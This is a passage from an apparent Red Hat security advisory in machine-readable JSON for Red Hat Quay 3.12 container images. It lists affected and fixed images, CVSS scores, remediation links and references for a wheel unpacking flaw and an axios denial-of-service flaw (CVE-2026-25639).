"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "wheel: wheel: Privilege Escalation or Arbitrary Code Execution via malicious wheel file unpacking"
},
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-18T16:21:15+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:4942"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
